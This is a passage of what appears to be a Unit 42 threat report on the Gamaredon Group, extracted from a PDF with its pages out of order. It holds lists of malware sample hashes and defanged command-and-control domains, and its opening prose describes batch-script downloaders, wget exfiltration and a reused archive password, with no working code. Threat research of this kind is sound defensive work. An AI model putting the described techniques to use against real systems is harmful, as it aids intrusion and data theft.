0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83
4a9c473209596f2abb19c0a15b638458ef2c27a208053ec6f89b7b5e8efc882f
b36087991947633cfb1d758065323daf9e2179f668a31e6f639d85f946bef3cd
93ce0b122022fbd855b22e88b6598f705a319154cc3b6693f0a55fee8382fdbf
dc0bbbd2d6b7d37886059415d6cdcb4ac93b55ae06162670407b6aa0eaf44b63
ebfb311bf63b625ddf60d925669cf6b52a8980636a7b1536341cc78ac494eeb4
c7b07e16f61c792b8ccf5de098b0b291957b83184786b578bf87dcf3aba06d1e
550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc
42c5651efc6ff62f6315f315f25c0407e773e702f43cca806ffb4c8ff899f524
69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3
a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b
45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e
e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53
f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45
f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642
e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053
15/35
03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02
b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2
7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4
08cc9d83ae7f9805058555a43ec0f0daa73346feb38c2c244b3a4311f623d3b7
e73b2fdd33a250705dd044761a1890afe5ba0b1553b2c7ae5dbedd45e58c0a0a
e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18
bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710
35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3
320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560
206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b
b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546
31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7
4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52
c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42
ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a
dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3
2977ecd28f44130c0afec70578b1c4fe240e39ad201d2ddd7fe1d9c2bd1330a2
5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387
b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5
b86f42f252d586d032ee0e4022585c457f98f667bbe9f2f4ba4d53e6f34537fa
b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702
7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f
271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02
f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8
cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4
0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8
63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94
b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca
d9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623
ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9
d23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f
16/35
dd4d9ff987aaa9f2bdf526207a97d7182ef3be37fa08591a40e9bdcb8937c2d4
e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452
00b3dcdeed117b8eaefff05246114c2ca49e88b3ccbac073c5cd87318e215f37
34084bc57ca269c05ef65720bc39d8bd284000316242721982f4538af351852a
df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47
221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30
0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710
09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc
ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba
126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1
f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d
5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed
70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3
26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714
abd5cf43abd878e8d7633e19bc309de840ec4e12624cabd99ac6152d9455d44f
b84328459e911de77827392db7967bb9ebefe90e365a8369ab8716a6b50aa5a2
dfdb3b363d82d552b8b1a1de116f6e68c2a055170a5c83f43575ad3ae9b90ddb
e5ef4e95831f24f345b4c00834b88b19098cada540da6aa60ba7ca861d20fd95
8e04108c5e164c1f077f0abeac10fdf295207e1f160350d999527ce23f078385
385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf
3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41
05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7
e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c
9f7e640951097f84b7ab42514ec2eae951b3c1b817c68efa9daae4345d2695b2
88e075627d93bbf43eabd699ca9afac0cceaf43f18f8c7ac43f2a7f93a247b55
06b8fa74196fa7edccb77a4bde000928a8ec15d56c5dd3c4af7237f876fc0991
c6db6e329d73616e6869bbb4f86fbdcab88c948176253df82729a2010493b09a
93867701be29f7154cf9f4bc72faad9e9859f4db3ed3030c04fcf03bab085b10
7f4fc4475cf86628ac5277c363fbe0bf47e87e726e4247eabe788e4440bf5bff
fd348ee3cc11647a87a7a065cc8dcc63cacad3349da567ce6cb5eb3f7d0a6ad1
fb6aa05b6c9a6d394d33f2a6cdd4a9c626eaf784990b69aab15e6ebc51908739
17/35
90aa424f52bd1f227ace86348c707ecc711c808526805915c50dfebf4bc49186
b131f561551cfe16804cffa4ed1651576ddb9e880913d245c23c7756311e474c
1d9ea027c8494e88148aa1b2d87bd13cf753902445423ac63257b89ccff1dd9e
88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a
40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a
3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f
f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff
3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22
76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da
09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305
6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692
5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c
b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9
4f7a58f1809fd0685ec815d0f5c910d39ef27ed2c4576339b3477a44aa756bad
86debb3398b60748c2c1d0d88694c7308f2017c6737490e84fe688396a0c5aa4
f2693ac1f73aa32dc4682ca66918e3ed78ed490cabc942018a6eca8c4aed9630
810e765fc4b9f838ed619a777528b243573d79e93ab29d8e1e3071ea2619fe0f
18241e18bdb290aa026d87c6d3dfa780d76347e8e966f3956bdfe44f36325473
c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223
5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12
f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4
f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c
de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1
60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d
3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7
9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7
2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9
d95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a
e267f9233c885d662804197e153e69cb2f7704f14b5d082dce7fe3c2d581d4df
6886aa1e2760b874a4950cac08e76259ff476a1976a0aeca4d392f60eefca6cc
1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074
18/35
12558c50b9b61d080aac7b0890f1b95142316ae0d4e78dfb98672571543ecf6e
05789b1487fa274943d967834ad530bc89d94aeed8c240f96d9922f05d6fb101
a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe
f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987
5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf
86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178
1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c
949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58
9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526
de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267
c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d
2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271
8ff4c76bc1bf9a10b17fdcfdd300b89df94be848ecb0af81f6aefba38ec5bfae
102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26
5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3
f3e45f9e4dbd773b64cfe164de9e42f250f996b58b619fc2f0773be7965d235d
6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b
ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b
a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3
7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402
3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a
1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c
413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056
780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07
bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662
3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d
215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a
1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408
69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886
103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c
78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175
19/35
ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c
d2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0
66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294
d9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71
14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9
023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731
cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449
93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6
f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be
3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a
3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722
cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876
9003bfa0553e0e027105f822d08a82050854ecf6488db4d3c412d6996b1bf632
5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543
f40f1dda30d5f959bc21b0049432c53bb06992c7c8fdd5e886a9b3a0fab06877
b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893
fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c
0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4
6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9
0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a
9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437
28e888ec5247511d01df376f4be7e08c64841df37d9846580e87145c8efbbd10
5693592ed69ca1cf0a5f8dcf8f548c063da287ce3e164a89df720a39a290feea
1b6651a523be1c42f779877ad11f3b52130686aad4fd4ecdfbc15afbcea56aa2
6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e
46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b
998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b
4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0
1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e
0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685
3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b
20/35
dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa
7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266
75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778
210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc
97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2
cbc9e5552cda22130cd7a84cd4b3c68e95eb3f8c2e83dd77253bd1822d1f840d
bf00cd1bc34ce457b0e4a99a8df5b7fda512496dc32f2762923254bc85261afb
9de260dcfe2f5a852c0cff238ffc3fe3fc93feff008463af49f68c9f5b5ebc9b
cadb1646563a317ac72579e8691c464bab439667811fb0d850bc2e950a3a332c
dd3d708ba8ce177fd1f756ac5eb3347a0ec7cf65706438ea5bbdfe9125b0dbe4
31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff
e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2
dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595
42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8
e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5
79ca3b8afac2ca896d7db2110789a187ad75810e2d92aa6f0378f73c1f72006f
ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7
b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db
2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a
77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43
610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844
60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55
376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276
89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3
18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f
bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac
187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3
7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106
44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5
810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41
Appendix B: Associated Domains
21/35
1c-host[.]host
1cpred[.]org
allforest[.]pw
antiprt[.]com
atonix[.]pw
babbabbab[.]ru
babbabbab2[.]ru
babbebbab[.]com
babbebbab2[.]com
babbibbab2[.]ua
babbihbab[.]host
babblabbab2[.]link
babblahbab[.]com
babblebbab[.]pw
babblebbab2[.]pw
babblehbab[.]top
babblibbab2[.]xyz
babblihbab[.]link
babblohbab[.]pw
babblulbab[.]pw
babbobbab[.]link
babbohbab[.]com
babbolbab[.]host
babbolbab[.]ru
babbrabbab2[.]xyz
babbrebbab[.]rocks
babbrebbab2[.]rocks
babbrehbab[.]pw
babbribbab2[.]space
babbrihbab[.]xyz
babbrohbab[.]rocks
22/35
babbrulbab[.]rocks
babbulbab[.]com
babchabbab[.]org
babchabbab2[.]org
babchebbab2[.]ru
babchehbab[.]in
babchibbab[.]com
babchihbab[.]org
babcholbab[.]org
babclabbab2[.]space
babclebbab[.]biz
babclebbab2[.]biz
babclehbab[.]rocks
babclibbab2[.]in
babclihbab[.]space
babclohbab[.]biz
babclulbab[.]biz
babcrabbab2[.]in
babcrambab[.]ru
babcrebbab[.]org
babcrebbab2[.]org
babcrehbab[.]biz
babcribbab[.]ru
babcrihbab[.]in
babcrohbab[.]org
babcruhbab[.]host
babcrulbab[.]org
babdabbab[.]ua
babdabbab2[.]ua
babdebbab[.]link
babdebbab2[.]link
23/35
babdibbab2[.]pw
babdihbab[.]top
babdobbab[.]xyz
babdohbab[.]link
babdolbab[.]top
babdrabbab2[.]ru
babdrambab[.]ua
babdrebbab[.]com
babdrebbab2[.]com
babdrehbab[.]org
babdribbab[.]ua
babdrihbab[.]host
babdrohbab[.]com
babdruhbab[.]top
babdrulbab[.]com
babdulbab[.]link
babfabbab[.]pw
babfabbab2[.]pw
babfebbab[.]top
babfebbab[.]xyz
babfebbab2[.]xyz
babfibbab2[.]rocks
babfihbab[.]pw
babflabbab2[.]ua
babflambab[.]pw
babflebbab[.]link
babflebbab2[.]link
babflehbab[.]com
babflibbab[.]pw
babflihbab[.]top
babflohbab[.]link
24/35
babfluhbab[.]pw
babflulbab[.]link
babfobbab[.]space
babfohbab[.]xyz
babfolbab[.]pw
babfrabbab2[.]pw
babfrebbab[.]xyz
babfrebbab2[.]xyz
babfrehbab[.]link
babfribbab[.]rocks
babfrihbab[.]pw
babfrohbab[.]xyz
babfrulbab[.]xyz
babfulbab[.]xyz
babgabbab2[.]rocks
babgebbab[.]space
babgebbab2[.]space
babgibbab2[.]biz
babgihbab[.]rocks
babglabbab2[.]rocks
babglebbab[.]space
babglebbab2[.]space
babglehbab[.]xyz
babglibbab[.]biz
babglihbab[.]rocks
babglohbab[.]space
babglulbab[.]space
babgobbab[.]in
babgofbab[.]biz
babgohbab[.]space
babgrabbab2[.]biz
25/35
babgrebbab[.]in
babgrebbab2[.]in
babgrehbab[.]space
babgribbab[.]org
babgrihbab[.]biz
babgrohbab[.]in
babgrulbab[.]in
babgulbab[.]space
babhabbab2[.]biz
babhebbab[.]in
babhebbab2[.]in
babhibbab2[.]org
babhihbab[.]biz
babhohbab[.]in
babhulbab[.]in
babjabbab2[.]org
babjebbab[.]ru
babjebbab2[.]ru
babjibbab2[.]com
babjihbab[.]org
babjohbab[.]host
babjulbab[.]host
babkabbab2[.]com
babkebbab[.]ua
babkebbab2[.]ua
babkehbab[.]host
babkibbab2[.]link
babkihbab[.]com
babkohbab[.]top
babkulbab[.]top
bablabbab2[.]link
26/35
bablebbab[.]pw
bablebbab2[.]pw
bablehbab[.]top
bablibbab2[.]xyz
bablihbab[.]link
bablohbab[.]pw
bablulbab[.]pw
babmabbab[.]xyz
babmabbab2[.]xyz
babmebbab[.]rocks
babmebbab2[.]rocks
babmehbab[.]pw
babmibbab2[.]space
babmihbab[.]xyz
babmilbab[.]pw
babmohbab[.]rocks
babmulbab[.]rocks
babnabbab2[.]space
babnebbab[.]biz
babnebbab2[.]biz
babnehbab[.]rocks
babnibbab2[.]in
babnihbab[.]space
babnohbab[.]biz
babnulbab[.]biz
babpabbab2[.]in
babpebbab[.]org
babpebbab2[.]org
babpehbab[.]biz
babpibbab2[.]ru
babpihbab[.]in
27/35
babplabbab2[.]org
babplebbab[.]ru
babplebbab2[.]ru
babplehbab[.]in
babplibbab[.]com
babplifbab[.]ru
babplihbab[.]org
babplohbab[.]host
babplulbab[.]host
babpohbab[.]org
babprabbab2[.]com
babprebbab[.]ua
babprebbab2[.]ua
babprehbab[.]host
babpribbab[.]link
babprihbab[.]com
babprulbab[.]top
babpulbab[.]org
babrabbab2[.]ru
babrebbab[.]com
babrebbab2[.]com
babrehbab[.]org
babribbab2[.]ua
babrihbab[.]host
babrohbab[.]com
babrulbab[.]com
babsabbab2[.]ua
babsahbab[.]host
babsebbab[.]link
babsebbab2[.]link
babsehbab[.]com
28/35
babsibbab2[.]pw
babsihbab[.]top
babskabbab2[.]link
babskebbab[.]pw
babskebbab2[.]pw
babskehbab[.]top
babskibbab[.]xyz
babskihbab[.]link
babslabbab2[.]xyz
babslebbab2[.]rocks
babslehbab[.]pw
babslibbab[.]space
babslihbab[.]xyz
babsmabbab2[.]space
babsmebbab2[.]biz
babsmehbab[.]rocks
babsmibbab[.]in
babsmihbab[.]space
babsnabbab2[.]in
babsnebbab2[.]org
babsnehbab[.]biz
babsnibbab[.]ru
babsnihbab[.]in
babsofbab[.]pw
babsohbab[.]link
babspabbab[.]ru
babspabbab2[.]ru
babspebbab2[.]com
babspefbab[.]ru
babspehbab[.]org
babspibbab[.]ua
29/35
babspihbab[.]host
babspolbab[.]host
babstabbab[.]ua
babstabbab2[.]ua
babstebbab2[.]link
babstefbab[.]com
babstehbab[.]com
babstibbab[.]pw
babstihbab[.]top
babstolbab[.]top
babstrabbab[.]pw
babstrabbab2[.]pw
babstrebbab2[.]xyz
babstrefbab[.]pw
babstrehbab[.]link
babstribbab[.]rocks
babstrihbab[.]pw
babstrolbab[.]pw
babsulbab[.]link
babswabbab[.]rocks
babswabbab2[.]rocks
babswebbab2[.]space
babswehbab[.]xyz
babswibbab[.]biz
babswihbab[.]rocks
babswolbab[.]rocks
babtabbab2[.]pw
babtahbab[.]top
babtebbab[.]xyz
babtebbab2[.]xyz
babtehbab[.]link
30/35
babtibbab2[.]rocks
babtihbab[.]pw
babtohbab[.]xyz
babtrabbab[.]biz
babtrabbab2[.]biz
babtrebbab2[.]in
babtrehbab[.]space
babtribbab[.]org
babtrihbab[.]biz
babtrolbab[.]biz
babtulbab[.]xyz
babvabbab2[.]rocks
babvahbab[.]pw
babvebbab[.]space
babvebbab2[.]space
babvehbab[.]xyz
babvibbab2[.]biz
babvihbab[.]rocks
babvohbab[.]space
babvulbab[.]space
babwabbab2[.]biz
babwahbab[.]rocks
babwebbab[.]in
babwebbab2[.]in
babwehbab[.]space
babwibbab2[.]org
babwihbab[.]biz
babwohbab[.]in
babwulbab[.]in
babyabbab2[.]org
babyahbab[.]biz
31/35
babyebbab[.]ru
babyebbab2[.]ru
babyehbab[.]in
babyibbab2[.]com
babyihbab[.]org
babyohbab[.]host
babyulbab[.]host
babzabbab2[.]com
babzahbab[.]org
babzebbab[.]ua
babzebbab2[.]ua
babzehbab[.]host
babzibbab2[.]link
babzihbab[.]com
babzohbab[.]top
babzulbab[.]top
bannarbor[.]pw
bisquitshore[.]xyz
bitrixon[.]biz
buhgalter[.]pw
buhgalter[.]rocks
buhgalters[.]xyz
businessolution[.]site
cheturion[.]org
chipacom[.]net
cloneduring[.]pw
companysafa[.]biz
corpofname[.]pw
datamining[.]press
dersteoyna[.]pw
dovnikus[.]su
32/35
efros[.]pw
flashclicks[.]info
forbusinessgo[.]xyz
fortificar[.]net
fracking[.]host
gateoflife[.]pw
gaz[.]rocks
gedealer[.]pw
globuspp[.]pw
grandvita[.]pw
greenlanterns[.]xyz
greenworldsun[.]xyz
guardomorph[.]com
guwang[.]pw
jobforreborn[.]xyz
kokinatsu[.]pw
kukuzaki[.]me
kupala[.]me
lastsnow[.]link
maradonianos[.]pw
mercurytod[.]pw
muxa[.]club
mycorpsafa[.]biz
n-nalog78[.]com
newsunconcept[.]in
newsupport[.]us
nothingmore[.]us
novayarabota[.]pw
nvpn[.]pw
odejda77[.]net
okvd[.]biz
33/35
olen[.]bid
onechat[.]pw
placetobuy[.]pw
platej[.]pw
poplata-da[.]org
portw[.]org
powersand[.]link
pricemeet[.]pw
puldisk[.]xyz
rabotadnya[.]pw
raintor[.]pw
ricarier[.]org
rosgaz[.]pw
rumoney[.]xyz
salesforlife[.]top
salesline[.]top
sam-sam[.]pw
sandstyle[.]biz
sandw[.]pw
santrimo[.]lol
seclist[.]site
seclist[.]top
selenaspace[.]space
sellgrax[.]club
semodo[.]pw
sensetunoespossible[.]cat
shortsell[.]trade
shortselling[.]club
sixgoats[.]pw
snp500[.]trade
solotender[.]pw
34/35
sslprivate[.]org
tapalulumba[.]com
taskhoper[.]com
titleworld[.]pw
torglend[.]com
tradertop[.]top
trendkop[.]pw
tyuocruz1312[.]net
uchet[.]pw
uchet[.]space
visitpalace[.]xyz
volumexp[.]xyz
vortexenism[.]biz
vpnserv[.]pw
vwv.flashclicks[.]info
winsocket[.]xyz
yearreviews[.]net
Updated 3/30/17: To remove unnecessary IPS Signature number.
35/35
The Gamaredon Group Toolset Evolution
researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
By Anthony Kasza and Dominik Reichel
2/27/2017
Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our
research shows that the Gamaredon Group has been active since at least 2013.
In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We
believe this shift indicates the Gamaredon Group have improved their technical capabilities. The custom-developed malware is fully featured an includes these capabilities:
A mechanism for downloading and executing additional payloads of their choice
The ability to scan system drives for specific file types
The ability to capture screenshots
The ability to remotely execute commands on the system in the user
s security context
The Gamaredon Group primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian country code top-level domains (ccTLDs), and Russian
hosting providers to distribute their custom-built malware.
Antimalware technologies have a poor record of detecting the malware this group has developed. We believe this is likely due to the modular nature of the malware, the malware
heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes.
Previously, LookingGlass reported on a campaign they named
Operation Armageddon,
targeting individuals involved in the Ukrainian military and national security establishment.
Because we believe this group is behind that campaign, we
ve named them the Gamaredon Group, an anagram of
Armageddon
. At this time, it is unknown if the new payloads
this group is distributing is a continuation of Operation Armageddon or a new campaign.
Gamaredon: Historical Tool Analysis
The earliest discovered sample (based on compile times and sandbox submission times) distributed by this threat group resembles the descriptions of Gamaredon provided by
Symantec and Trend Micro. Unfortunately, this identification is rather tenuous, as it seems to only identify the first variant of payloads used by our threat actors. Some samples of
later payload variants also have been given the generic and brittle names of TROJ_RESETTER.BB and TROJ_FRAUDROP.EX.
Originally, the payloads delivered to targets by this threat group consisted of a password protected Self-extracting Zip-archive (.SFX) file which, when extracted, wrote a batch
script to disk and installed a legitimate remote administration tool called tool Remote Manipulator System (Figure 1) which they would abuse for malicious purposes.
Figure 1 Remote Manipulator System Interface
One such self-extracting archive (ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc) was first observed around April of 2014. The password (reused by
many of the password protected SFX payloads) it used to extract itself is
1234567890__
. The files included in this SFX file we observed include a batch file named
123.cmd
and another SFX named
setting.exe
. This second SFX contains a .MSI installer package which installs Remote Manipulator System and a batch script which handles the
installation.
Later payloads would write batch scripts to disk as well as wget binaries. The batch scripts would use the wget binaries to download and execute additional executables. The
scripts would also use wget to send POST requests to command and control (C2) servers that would contain information about the compromised system. Some of these payloads
included decoy documents that would open when the malware is executed.
Three examples of this type of payload include:
1/13
a6a44ee854c846f31d15b0ca2d6001fb0bdddc85f17e2e56abb2fa9373e8cfe7
b5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13
3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b
We first observed these samples using wget in 2014. The filenames and decoy documents these samples used attempt to lure individuals by using the presidential administration
of Ukraine, Ukrainian national security and defense, the Anti-Terrorist Operation Zone in the Ukraine, and Ukrainian patriotism as subjects. The text of one such decoy document is
pictured below.
Figure 2 Ukrainian Decoy Document used by Gamaredon Group
Other observed payloads would, again, use SFX files to deliver a batch script and an executable that allowed remote access through the VNC protocol. These VNC exectuables
would either be included in the SFX file or downloaded by the batch script. We found one URL (now taken down) that hosted a VNC executable that the malware would attempt to
